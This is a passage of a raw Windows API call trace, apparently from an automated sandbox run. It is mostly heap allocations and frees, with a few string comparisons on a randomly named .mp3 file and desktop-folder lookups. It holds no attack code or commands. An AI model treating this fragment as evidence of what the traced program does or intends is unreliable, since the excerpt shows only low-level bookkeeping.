lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0105.316] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0105.316] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71e88 [0105.317] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0105.317] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ec8 [0105.317] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TtFu8ac2GuQ.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0105.317] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tFu8ac2GuQ.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0105.317] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Fu8ac2GuQ.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0105.317] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="u8ac2GuQ.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0105.317] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8ac2GuQ.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0105.317] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ac2GuQ.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0105.317] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c2GuQ.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0105.317] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2GuQ.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0105.317] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GuQ.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0105.317] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uQ.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0105.317] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0105.317] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0105.317] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0105.317] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ad0 | out: hHeap=0x2af0000) returned 1 [0105.317] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e88 | out: hHeap=0x2af0000) returned 1 [0105.317] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0105.317] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0105.317] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0105.317] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0105.317] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0105.317] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0105.317] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0105.317] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0105.317] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa60d0 | out: hHeap=0x2af0000) returned 1 [0105.317] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0105.317] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0105.317] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0105.317] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0105.317] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0105.317] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0105.317] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0105.318] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0105.318] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f30 | out: hHeap=0x2af0000) returned 1 [0105.318] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0105.318] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0105.318] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72628 [0105.318] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0105.318] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0105.318] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0105.318] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0105.318] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0105.318] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0105.318] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0105.318] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0105.318] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a68440 [0105.318] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0105.318] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0105.318] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0105.318] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0105.318] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9220 [0105.318] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0105.318] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0105.318] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa90b8 [0105.318] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0105.318] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf3a8 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0105.318] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0105.318] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa6450 [0105.318] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0105.318] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0105.318] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0105.319] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0105.319] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0105.319] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0105.319] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0105.319] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0105.319] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0105.319] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0105.319] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0105.319] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0105.319] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fe0 [0105.319] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0105.319] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x2a75948 [0105.319] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa6450 | out: hHeap=0x2af0000) returned 1 [0105.319] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0105.319] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0105.319] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0105.319] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0105.319] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0105.319] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fe0 | out: hHeap=0x2af0000) returned 1 [0105.319] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0105.319] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0105.319] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72718 [0105.319] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0105.319] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0105.319] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0105.319] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0105.319] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0105.319] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0105.319] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0105.319] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a68440 [0105.319] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0105.320] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0105.320] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0105.320] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0105.320] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9250 [0105.320] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0105.320] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0105.320] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9208 [0105.320] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0105.320] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf3a8 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0105.320] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0105.320] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa6370 [0105.320] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0105.320] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0105.320] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0105.320] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0105.320] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0105.320] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0105.320] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0105.320] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0105.320] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0105.320] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0105.320] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0105.320] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0105.320] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7200 [0105.320] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0105.320] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x80) returned 0x2a68440 [0105.320] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa6370 | out: hHeap=0x2af0000) returned 1 [0105.320] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0105.320] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0105.320] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0105.320] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7200 | out: hHeap=0x2af0000) returned 1 [0105.321] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0105.321] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0105.321] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72698 [0105.321] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0105.321] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0105.321] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0105.321] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0105.321] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72738 [0105.321] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0105.321] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0105.321] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0105.321] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9220 [0105.321] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0105.321] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0105.321] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a726a8 [0105.321] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0105.321] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0105.321] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0105.321] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0105.321] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0105.321] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0105.321] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0105.321] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0105.321] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0105.321] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0105.321] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0105.321] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0105.321] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0105.321] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0105.321] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0105.321] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0105.321] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0105.321] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0105.322] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0105.322] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0105.322] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a728f8 [0105.322] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0105.322] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0105.322] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0105.322] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0105.322] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0105.322] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0105.322] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0105.322] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0105.322] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0105.322] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0105.322] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0105.322] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0105.322] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b58 [0105.322] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0105.322] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0105.322] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b48 | out: hHeap=0x2af0000) returned 1 [0105.322] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0105.322] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0105.322] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0105.322] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0105.322] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0105.322] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0105.322] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e640 [0105.322] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0105.322] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e640 | out: hHeap=0x2af0000) returned 1 [0105.322] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0105.322] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0105.322] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a08 [0105.322] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0105.323] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0105.323] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0105.323] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95e0 [0105.323] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a38 [0105.323] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0105.323] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0105.323] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72aa8 [0105.323] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0105.323] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0105.323] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0105.323] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0105.323] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0105.323] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0105.323] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0105.323] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b28 [0105.323] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0105.323] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0105.323] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a58 [0105.323] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0105.323] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0105.323] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0105.323] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0105.323] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b48 | out: hHeap=0x2af0000) returned 1 [0105.323] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0105.323] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0105.323] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0105.323] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0105.323] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b08 [0105.323] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0105.323] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0105.323] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0105.323] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0105.324] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b58 [0105.324] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0105.324] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0105.324] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a08 [0105.324] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0105.324] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0105.324] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0105.324] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0105.324] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b18 [0105.324] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0105.324] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0105.324] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0105.324] RtlAllocateHeap (HeapHandle=0x2af0000, 